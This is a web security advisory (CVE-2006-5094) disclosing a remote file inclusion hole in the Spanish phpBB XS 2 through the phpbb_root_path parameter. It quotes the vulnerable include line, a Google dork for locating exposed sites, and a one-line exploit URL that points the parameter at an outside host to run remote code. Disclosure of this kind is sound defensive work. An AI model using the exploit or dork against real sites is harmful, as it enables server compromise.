|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 1660 CVE : CVE-2006-5094 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : chris hasibuan Published : 03.10.2006
Advisory Content : #############################SolpotCrew Community################################ # # phpBB XS 2 spain version (phpbb_root_path) Remote File Inclusion # # Download : http://www.elanzuelo.es/phpbb.tar.gz # ######################################################################## ######### # # # Bug Found By :Solpot a.k.a (k. Hasibuan) (28-09-2006) # # contact: chris_hasibuan (at) yahoo (dot) com [email concealed] # # Website : http://www.nyubicrew.org/adv/solpot-adv-10.txt # ######################################################################## ######## # # # Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid ,Noordin`M`TOP # robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa # home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo # Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX # x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^ , Soey , vend3r , k1tk4t # [K]ompoR_Meledu[K] , Scr3W_W0rM , TOMMY^PENGAMEN , Belaj4r, ^NakKuta # and all member solpotcrew community @ http://nyubicrew.org/forum/ # especially thx to str0ke @ milw0rm.com # ######################################################################## ####### Input passed to the "phpbb_root_path" is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources. code from includes/functions_kb.php /*********************************************************************** **** * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * ************************************************************************ ***/ // // get_quick_stats(); // gets number of articles // include_once($phpbb_root_path.'includes/functions_color_groups.'.$phpEx) ; function get_quick_stats() Google Dork : "Traduccion Espanol por phpBB-Es" Exploit : http://somehost/path_to_phpbbXS2/includes/functions_kb.php?phpbb_root_pa th=http://injek-pala-lappet? ##############################MY LOVE JUST FOR U RIE######################### ######################################E.O.F############################# #####  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |